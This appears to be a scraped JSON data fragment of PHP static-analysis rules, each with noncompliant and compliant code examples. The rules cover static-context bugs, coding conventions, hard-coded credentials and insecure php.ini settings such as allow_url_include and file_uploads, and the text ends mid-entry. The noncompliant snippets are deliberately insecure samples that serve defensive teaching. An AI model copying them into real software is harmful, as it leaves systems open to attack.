...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction foo($myStateVariable)\n{\n \/\/ ...\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2014","repo":"php","name":"\"$this\" should not be used in a static context","htmlDesc":"<p><code>$this<\/code> refers to the current class instance. But static methods can be accessed without instantiating the class, and <code>$this<\/code>\nis not available to them. Using <code>$this<\/code> in a static context will result in a fatal error at runtime.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Clazz {\n $name=NULL; \/\/ instance variable\n\n public static function foo(){\n if ($this->name != NULL) {\n \/\/ ...\n }\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Clazz {\n $name=NULL; \/\/ instance variable\n\n public static function foo($nameParam){\n if ($nameParam != NULL) {\n \/\/ ...\n }\n }\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2036","repo":"php","name":"Files that define symbols should not cause side-effects","htmlDesc":"<p>Files that define symbols such as classes and variables may be included into many files. Simply performing that inclusion should have no effect on\nthose files other than declaring new symbols. For instance, a file containing a class definition should not also contain side-effects such as\n<code>print<\/code> statements that will be evaluated automatically on inclusion. Logic should be segregated into symbol-only files and\nside-effect-only files. The type of operation which is not allowed in a symbol-definition file includes but is not limited to: <\/p>\n<ul>\n <li> generating output <\/li>\n <li> modifying <code>ini<\/code> settings <\/li>\n <li> emitting errors or exceptions <\/li>\n <li> modifying global or static variables <\/li>\n <li> reading\/writing files <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n<?php\n\nprint \"Include worked!\";\n\nclass foo {\n \/\/ ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n<?php\n\nclass foo {\n\n public function log() {\n print \"Include worked!\";\n }\n\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/www.php-fig.org\/psr\/psr-1\/\">PHP-FIG Basic Coding Standard PSR1<\/a>, 2.3 - Side Effects <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2037","repo":"php","name":"Static members should be referenced with \"static::\"","htmlDesc":"<p>References in a class to static class members (fields or methods) can be made using either <code>self::$var<\/code> or <code>static::$var<\/code>\n(introduced in 5.3). The difference between the two is one of scope. Confusingly, in subclasses, the use of <code>self::<\/code> references the\noriginal definition of the member, i.e. the superclass version, rather than any override at the subclass level. <code>static::<\/code>, on the other\nhand, references the class that was called at runtime.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n<?php\n\nclass Toy {\n\n public static function status() {\n self::getStatus(); \/\/ Noncompliant; will always print \"Sticks are fun!\" even when called from a subclass which overrides this method;\n }\n\n protected static function getStatus() {\n echo \"Sticks are fun!\";\n }\n}\n\nclass Ball extends Toy {\n\n protected static function getStatus() { \/\/ Doesn't actually get called\n echo \"Balls are fun!\";\n }\n}\n\n$myBall = new Ball();\n$myBall::status(); \/\/ Prints \"Sticks are fun!\"\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n<?php\n\nclass Toy {\n\n public static function status() {\n static::getStatus(); \/\/ Compliant\n }\n\n protected static function getStatus() {\n echo \"Sticks are fun!\";\n }\n}\n\nclass Ball extends Toy {\n\n protected static function getStatus() {\n echo \"Balls are fun!\";\n }\n}\n\n$myBall = new Ball();\n$myBall::status(); \/\/ Prints \"Balls are fun!\"\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>No issue is raised when <code>self<\/code> is used on a constant field, a private field or a private method.<\/p>\n<pre>\nclass A\n{\n private static $somevar = \"hello\";\n const CONSTANT = 42;\n\n private static function foo()\n {\n $var = self::$somevar . self::CONSTANT; \/\/ Should be OK\n self::foo(); \/\/ Should be OK\n }\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2038","repo":"php","name":"Colors should be defined in upper case","htmlDesc":"<p>Shared coding conventions allow teams to collaborate effectively. Writing colors in upper case makes them stand out at such, thereby making the\ncode easier to read.<\/p>\n<p>This rule checks that hexadecimal color definitions are written in upper case.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$white = '#ffffff'; \/\/ Noncompliant\n$dkgray = '#006400';\n$aqua = '#00ffff'; \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$white = '#FFFFFF'; \/\/ Compliant\n$dkgray = '#006400';\n$aqua = '#00FFFF'; \/\/ Compliant\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2041","repo":"php","name":"Parentheses should not be used for calls to \"echo\"","htmlDesc":"<p><code>echo<\/code> can be called with or without parentheses, but it is best practice to leave parentheses off the call because using parentheses\nwith multiple arguments will result in a parse error.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\necho(\"Hello\"); \/\/ Noncompliant, but it works\necho(\"Hello\", \"World\"); \/\/ Noncompliant. Parse error\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\necho \"Hello\";\necho \"Hello\",\"World!\";\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2043","repo":"php","name":"Superglobals should not be accessed directly","htmlDesc":"<p>Superglobal variables are predefined variables available in all scopes throughout a script. However, accessing them directly is considered bad\npractice. Instead, they should be accessed through an object or framework that handles sanitation and validation.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$name = $_POST['name'];\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$name = $this->params()->fromPost('name');\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2044","repo":"php","name":"\"php_sapi_name()\" should not be used","htmlDesc":"<p>Both <code>php_sapi_name()<\/code> and the <code>PHP_SAPI<\/code> constant give the same value. But calling the method is less efficient that simply\nreferencing the constant. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (php_sapi_name() == 'test') { ... }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (PHP_SAPI == 'test') { ... }\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2046","repo":"php","name":"Perl-style comments should not be used","htmlDesc":"<p>Shared coding conventions allow teams to collaborate effectively. This rule flags all Perl-style comments.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$myvar; # Noncompliant; this comment should have started with \"\/\/\"\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$myvar; \/\/ Compliant; this comment started with \"\/\/\"\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2047","repo":"php","name":"The names of methods with boolean return values should start with \"is\" or \"has\"","htmlDesc":"<p>Well-named functions can allow the users of your code to understand at a glance what to expect from the function - even before reading the\ndocumentation. Toward that end, methods returning a boolean property should have names that start with \"is\" or \"has\" rather than with \"get\".<\/p>\n<p>Note that this rule will only apply to functions that are documented to return a boolean.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n\/**\n * @return boolean\n *\/\npublic function getFoo() \/\/ Noncompliant\n{\n return foo;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\/**\n * @return boolean\n *\/\npublic function isFoo()\n{\n return true;\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2050","repo":"php","name":"Alias functions should not be used","htmlDesc":"<p>Certain functions exist in PHP only as aliases of other functions. These aliases have been made available for backward compatibility, but should\nreally be removed from code. <\/p>\n<p>This rule looks for uses of the following aliases:<\/p>\n<table>\n <tbody>\n <tr>\n <th>Alias<\/th>\n <th>Replacement<\/th>\n <\/tr>\n <tr>\n <td><code>chop<\/code><\/td>\n <td><code>rtrim<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>close<\/code><\/td>\n <td><code>closedir<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>doubleval<\/code><\/td>\n <td><code>floatval<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>fputs<\/code><\/td>\n <td><code>fwrite<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>ini_alter<\/code><\/td>\n <td><code>ini_set<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>is_double<\/code><\/td>\n <td><code>is_float<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>is_integer<\/code><\/td>\n <td><code>is_int<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>is_long<\/code><\/td>\n <td><code>is_int<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>is_real<\/code><\/td>\n <td><code>is_float<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>is_writeable<\/code><\/td>\n <td><code>is_writable<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>join<\/code><\/td>\n <td><code>implode<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>key_exists<\/code><\/td>\n <td><code>array_key_exists<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>magic_quotes_runtime<\/code><\/td>\n <td><code>set_magic_quotes_runtime<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>pos<\/code><\/td>\n <td><code>current<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>show_source<\/code><\/td>\n <td><code>highlight_file<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>sizeof<\/code><\/td>\n <td><code>count<\/code><\/td>\n <\/tr>\n <tr>\n <td><code>strchr<\/code><\/td>\n <td><code>strstr<\/code><\/td>\n <\/tr>\n <\/tbody>\n<\/table>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$arr=array(\"apple\", \"pear\",\"banana\");\necho sizeof($arr); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$arr=array(\"apple\", \"pear\",\"banana\");\necho count($arr);\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2068","repo":"php","name":"Credentials should not be hard-coded","htmlDesc":"<p>Because it is easy to extract strings from a compiled application, credentials should never be hard-coded. Do so, and they're almost guaranteed to\nend up in the hands of an attacker. This is particularly true for applications that are distributed.<\/p>\n<p>Credentials should be stored outside of the code in a strongly-protected encrypted configuration file or database.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$uname = \"steve\";\n$password = \"blue\";\nconnect($uname, $password);\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n$uname = getEncryptedUser();\n$password = getEncryptedPass();\nconnect($uname, $password);\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/798\">MITRE, CWE-798<\/a> - Use of Hard-coded Credentials <\/li>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/259\">MITRE, CWE-259<\/a> - Use of Hard-coded Password <\/li>\n <li> <a href=\"http:\/\/www.sans.org\/top25-software-errors\/\">SANS Top 25<\/a> - Porous Defenses <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/qQCHAQ\">CERT, MSC03-J.<\/a> - Never hard code sensitive information <\/li>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A2-Broken_Authentication_and_Session_Management\">OWASP Top Ten 2013 Category A2<\/a> -\n Broken Authentication and Session Management <\/li>\n <li> Derived from FindSecBugs rule <a href=\"http:\/\/h3xstream.github.io\/find-sec-bugs\/bugs.htm#HARD_CODE_PASSWORD\">Hard Coded Password<\/a> <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S2260","repo":"php","name":"PHP parser failure","htmlDesc":"<p>When the PHP parser fails, it is possible to record the failure as a violation on the file. This way, not only it is possible to track the number\nof files that do not parse but also to easily find out why they do not parse.<\/p>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S2681","repo":"php","name":"Multiline blocks should be enclosed in curly braces","htmlDesc":"<p>Curly braces can be omitted from a one-line block, such as with an <code>if<\/code> statement or <code>for<\/code> loop, but doing so can be\nmisleading and induce bugs. <\/p>\n<p>This rule raises an issue when the indentation of the lines after a one-line block indicates an intent to include those lines in the block, but the\nomission of curly braces means the lines will be unconditionally executed once.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif ($condition)\n firstActionInBlock();\n secondAction(); \/\/ Noncompliant; executed unconditionally\nthirdAction();\n\n$str = null;\nfor ($i = 0; $i < count($array); $i++)\n $str = $array[$i];\n doTheThing($str); \/\/ Noncompliant; executed only on last array element\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($condition) {\n firstActionInBlock();\n secondAction();\n}\nthirdAction();\n\n$str = null;\nfor ($i = 0; $i < count($array); $i++) {\n $str = $array[$i];\n doTheThing($str);\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/483.html\">MITRE, CWE-483<\/a> - Incorrect Block Delimitation <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/3wHEAw\">CERT, EXP52-J.<\/a> - Use braces for the body of an if, for, or while statement\n <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S2830","repo":"php","name":"Class constructors should not create other objects","htmlDesc":"<p>Dependency injection is a software design pattern in which one or more dependencies (or services) are injected, or passed by reference, into a\ndependent object (or client) and are made part of the client's state. The pattern separates the creation of a client's dependencies from its own\nbehavior, which allows program designs to be loosely coupled and to follow the dependency inversion and single responsibility principles.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass SomeClass {\n\n public function __construct() {\n $this->object = new SomeOtherClass(); \/\/ Noncompliant\n }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass SomeClass {\n\n public function __construct(SomeOtherClass $object) {\n $this->object = $object;\n }\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S3332","repo":"php","name":"Session-management cookies should not be persistent","htmlDesc":"<p>Cookies without fixed lifetimes or expiration dates are known as non-persistent, or \"session\" cookies, meaning they last only as long as the\nbrowser session, and poof away when the browser closes. Cookies with expiration dates, \"persistent\" cookies, are stored\/persisted until those\ndates.<\/p>\n<p>Non-persistent cookies should be used for the management of logged-in sessions on web sites. To make a cookie non-persistent, simply omit the\n<code>expires<\/code> attribute.<\/p>\n<p>This rule raises an issue when <code>expires<\/code> is set for a session cookie, either programmatically or via configuration, such as\n<code>session.cookie_lifetime<\/code>.<\/p>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A3-Cross-Site_Scripting_(XSS)\">OWASP Top Ten 2013 Category A3<\/a> - Cross-Site Scripting\n (XSS) <\/li>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Session_Management_Cheat_Sheet#Expire_and_Max-Age_Attributes\">OWASP, Session Management Cheat\n Sheet<\/a> - Expire and Max-Age Attributes <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3333","repo":"php","name":"\"open_basedir\" should limit file access","htmlDesc":"<p>The <code>open_basedir<\/code> configuration in <em>php.ini<\/em> limits the files the script can access using, for example, <code>include<\/code> and\n<code>fopen()<\/code>. Leave it out, and there is no default limit, meaning that any file can be accessed. Include it, and PHP will refuse to access\nfiles outside the allowed path.<\/p>\n<p><code>open_basedir<\/code> should be configured with a directory, which will then be accessible recursively. However, the use of <code>.<\/code>\n(current directory) as an <code>open_basedir<\/code> value should be avoided since it's resolved dynamically during script execution, so a\n<code>chdir('\/')<\/code> command could lay the whole server open to the script.<\/p>\n<p>This is not a fool-proof configuration; it can be reset or overridden at the script level. But its use should be seen as a minimum due diligence\nstep. This rule raises an issue when <code>open_basedir<\/code> is not present in <em>php.ini<\/em>, and when <code>open_basedir<\/code> contains root,\nor the current directory (<code>.<\/code>) symbol.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini try 1\n; open_basedir=\"${USER}\/scripts\/data\" Noncompliant; commented out\n\n; php.ini try 2\nopen_basedir=\"\/:${USER}\/scripts\/data\" ; Noncompliant; root directory in the list\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n; php.ini try 1\nopen_basedir=\"${USER}\/scripts\/data\"\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/23.html\">MITRE, CWE-23<\/a> - Relative Path Traversal <\/li>\n <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/36.html\">MITRE, CWE-36<\/a> - Absolute Path Traversal <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3334","repo":"php","name":"\"allow_url_fopen\" and \"allow_url_include\" should be disabled","htmlDesc":"<p><code>allow_url_fopen<\/code> and <code>allow_url_include<\/code> allow code to be read into a script from URL's. The ability to suck in executable\ncode from outside your site, coupled with imperfect input cleansing could lay your site bare to attackers. Even if your input filtering is perfect\ntoday, are you prepared to bet your site that it will always be perfect in the future?<\/p>\n<p>This rule raises an issue when either property is explicitly enabled in <em>php.ini<\/em> and when <code>allow_url_fopen<\/code>, which defaults to\nenabled, is not explicitly disabled.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini Noncompliant; allow_url_fopen not explicitly disabled\nallow_url_include=1 ; Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n; php.ini\nallow_url_fopen=0\nallow_url_include=0\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/829.html\">MITRE, CWE-829<\/a> - Inclusion of Functionality from Untrusted Control Sphere <\/li>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A1-Injection\">OWASP Top Ten 2013 Category A1<\/a> - Injection <\/li>\n <li> <a href=\"http:\/\/www.sans.org\/top25-software-errors\/\">SANS Top 25<\/a> - Risky Resource Management <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3335","repo":"php","name":"\"cgi.force_redirect\" should be enabled","htmlDesc":"<p>The <code>cgi.force_redirect<\/code> <em>php.ini<\/em> configuration is on by default, and it prevents unauthenticated access to scripts when PHP is\nrunning as a CGI. Unfortunately, it must be disabled on IIS, OmniHTTPD and Xitami, but in all other cases it should be on.<\/p>\n<p>This rule raises an issue when when <code>cgi.force_redirect<\/code> is explicitly disabled.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini\ncgi.force_redirect=0 ; Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/305\">MITRE, CWE-305<\/a> - Authentication Bypass by Primary Weakness <\/li>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A5-Security_Misconfiguration\">OWASP Top Ten 2013 Category A5<\/a> - Security\n Misconfiguration <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3336","repo":"php","name":"\"session.use_trans_sid\" should not be enabled","htmlDesc":"<p>PHP's <code>session.use_trans_sid<\/code> automatically appends the user's session id to urls when cookies are disabled. On the face of it, this\nseems like a nice way to let uncookie-able users use your site anyway. In reality, it makes those users vulnerable to having their sessions hijacked\nby anyone who might:<\/p>\n<ul>\n <li> see the URL over the user's shoulder <\/li>\n <li> be sent the URL by the user <\/li>\n <li> retrieve the URL from browser history <\/li>\n <li> ... <\/li>\n<\/ul>\n<p>For that reason, it's better to practice a little \"tough love\" with your users and force them to turn on cookies.<\/p>\n<p>Since <code>session.use_trans_sid<\/code> is off by default, this rule raises an issue when it is explicitly enabled.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini\nsession.use_trans_sid=1 ; Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A5-Security_Misconfiguration\">OWASP Top Ten 2013 Category A5<\/a> - Security\n Misconfiguration <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3337","repo":"php","name":"\"enable_dl\" should be disabled","htmlDesc":"<p><code>enable_dl<\/code> is on by default and allows <code>open_basedir<\/code> restrictions, which limit the files a script can access, to be\nignored. For that reason, it's a dangerous option and should be explicitly turned off.<\/p>\n<p>This rule raises an issue when <code>enable_dl<\/code> is not explicitly set to 0 in <em>php.ini<\/em>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini\nenable_dl=1 ; Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n; php.ini\nenable_dl=0\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/23.html\">MITRE, CWE-23<\/a> - Relative Path Traversal <\/li>\n <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/36.html\">MITRE, CWE-36<\/a> - Absolute Path Traversal <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S3338","repo":"php","name":"\"file_uploads\" should be disabled","htmlDesc":"<p><code>file_uploads<\/code> is an on-by-default PHP configuration that allows files to be uploaded to your site. Since accepting <del>candy<\/del>\nfiles from strangers is inherently dangerous, this feature should be disabled unless it is absolutely necessary for your site.<\/p>\n<p>This rule raises an issue when <code>file_uploads<\/code> is not explicitly disabled.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n; php.ini\nfile_uploads=1 ; Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n; php.ini\nfile_uploads=0\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"https:\/\/cwe.mitre.org\/data\/definitions\/434.html\">MITRE, CWE-434<\/a> - Unrestricted Upload of File with Dangerous Type <\/li>\n <li> <a href=\"http:\/\/www.sans.org\/top25-software-errors\/\">SANS Top 25<\/a> - Insecure Interaction Between Components <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"VULNERABILITY"},{"key":"php:S881","repo":"php","name":"Increment (++) and decrement (--) operators should not be used in a method call or mixed with other operators in an expression","htmlDesc":"<p>The use of increment and decrement operators in method calls or in combination with other arithmetic operators is not recommended, because:<\/p>\n<ul>\n <li> It can significantly impair the readability of the code. <\/li>\n <li> It introduces additional side effects into a statement, with the potential for undefined behavior. <\/li>\n <li> It is safer to use these operators in isolation from any other arithmetic operators. <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$u8a = ++$u8b + $u8c--;\n$foo = $bar++ \/ 4;\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<p>The following sequence is clearer and therefore safer:<\/p>\n<pre>\n++$u8b;\n$u8a = $u8b + $u8c;\n$u8c--;\n$foo = $bar \/ 4;\n$bar++;\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 12.1 - Limited dependence should be placed on the C operator precedence rules in expressions. <\/li>\n <li> MISRA C:2004, 12.13 - The increment (++) and decrement (--) operators should not be mixed with other operators in an expression. <\/li>\n <li> MISRA C++:2008, 5-2-10 - The increment (++) and decrement (--) operator should not be mixed with other operators in an expression. <\/li>\n <li> MISRA C:2012, 12.1 - The precedence of operators within expressions should be made explicit <\/li>\n <li> MISRA C:2012, 13.3 - A full expression containing an increment (++) or decrement (--) operator should have no other potential side effects\n other than that cause by the increment or decrement operator <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/ZwE\">CERT, EXP30-C.<\/a> - Do not depend on the order of evaluation for side effects\n <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/fYAyAQ\">CERT, EXP50-CPP.<\/a> - Do not depend on the order of evaluation for side\n effects <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/yQC7AQ\">CERT, EXP05-J.<\/a> - Do not follow a write by a subsequent write or read of the\n same object within an expression <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S905","repo":"php","name":"Non-empty statements should change control flow or have at least one side-effect","htmlDesc":"<p>Any statement (other than a null statement, which means a statement containing only a semicolon <code>;<\/code>) which has no side effect and does\nnot result in a change of control flow will normally indicate a programming error, and therefore should be refactored.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$a == 1; \/\/ Noncompliant; was assignment intended?\n$a < $b; \/\/ Noncompliant; have we forgotten to assign the result to a variable?\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/482\">MITRE, CWE-482<\/a> - Comparing instead of Assigning <\/li>\n <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n <li> MISRA C:2004, 14.2 - All non-null statements shall either have at least one side-effect however executed, or cause control flow to change.\n <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S907","repo":"php","name":"\"goto\" statement should not be used","htmlDesc":"<p><code>goto<\/code> is an unstructured control flow statement. It makes code less readable and maintainable. Structured control flow statements such\nas <code>if<\/code>, <code>for<\/code>, <code>while<\/code>, <code>continue<\/code> or <code>break<\/code> should be used instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$i = 0;\nloop:\n echo(\"i = $i\");\n $i++;\n if ($i < 10){\n goto loop;\n }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor ($i = 0; $i < 10; $i++){\n echo(\"i = $i\");\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n <li> MISRA C:2004, 14.4 - The goto statement shall not be used. <\/li>\n <li> MISRA C:2012, 15.1 - The goto statement should not be used <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"}],"language":"php","languages":{"cs":"C#","java":"Java","js":"JavaScript","objc":"Objective C","php":"PHP","swift":"Swift","vbnet":"VB.NET","android":"Android","py":"Python"},"ranktag":"^rank\\d$"};- Exclude checks
BUG found Open
Open
window.data = {"total":112,"p":1,"ps":500,"rules":[{"key":"common-php:DuplicatedBlocks","repo":"common-php","name":"Source files should not have any duplicated blocks","htmlDesc":"An issue is created on a file as soon as there is at least one block of duplicated code on this file","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"common-php:FailedUnitTests","repo":"common-php","name":"Failed unit tests should be fixed","htmlDesc":"Test failures or errors generally indicate that regressions have been introduced. Those tests should be handled as soon as possible to reduce the cost to fix the corresponding regressions.","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"common-php:InsufficientCommentDensity","repo":"common-php","name":"Source files should have a sufficient density of comment lines","htmlDesc":"An issue is created on a file as soon as the density of comment lines on this file is less than the required threshold. The number of comment lines to be written in order to reach the required threshold is provided by each issue message.","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"minimumCommentDensity","defaultValue":"25","type":"FLOAT"}],"type":"CODE_SMELL"},{"key":"common-php:InsufficientLineCoverage","repo":"common-php","name":"Lines should have sufficient coverage by tests","htmlDesc":"An issue is created on a file as soon as the line coverage on this file is less than the required threshold. It gives the number of lines to be covered in order to reach the required threshold.","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"minimumLineCoverageRatio","defaultValue":"65","type":"FLOAT"}],"type":"CODE_SMELL"},{"key":"common-php:SkippedUnitTests","repo":"common-php","name":"Skipped unit tests should be either removed or fixed","htmlDesc":"Skipped unit tests are considered as dead code. Either they should be activated again (and updated) or they should be removed.","status":"READY","tags":["rank5"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S100","repo":"php","name":"Function names should comply with a naming convention","htmlDesc":"<p>Shared naming conventions allow teams to collaborate efficiently. This rule checks that all function names match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With default provided regular expression: <code>^[a-z][_a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\nfunction DoSomething(){...}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething(){...}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Methods with an <code>@inheritdoc<\/code> annotation, as well as magic methods (<code>__construct()<\/code>, <code>__destruct()<\/code>,\n<code>__call()<\/code>, <code>__callStatic()<\/code>, <code>__get()<\/code>, <code>__set()<\/code>, <code>__isset()<\/code>, <code>__unset()<\/code>,\n<code>__sleep()<\/code>, <code>__wakeup()<\/code>, <code>__toString()<\/code>, <code>__invoke()<\/code>, <code>__set_state()<\/code>,\n<code>__clone()<\/code>, <code>__debugInfo()<\/code>) are ignored.<\/p>\n<pre>\nfunction __construct(){...}\nfunction __destruct(){...}\n\n\/**\n * {@inheritdoc}\n 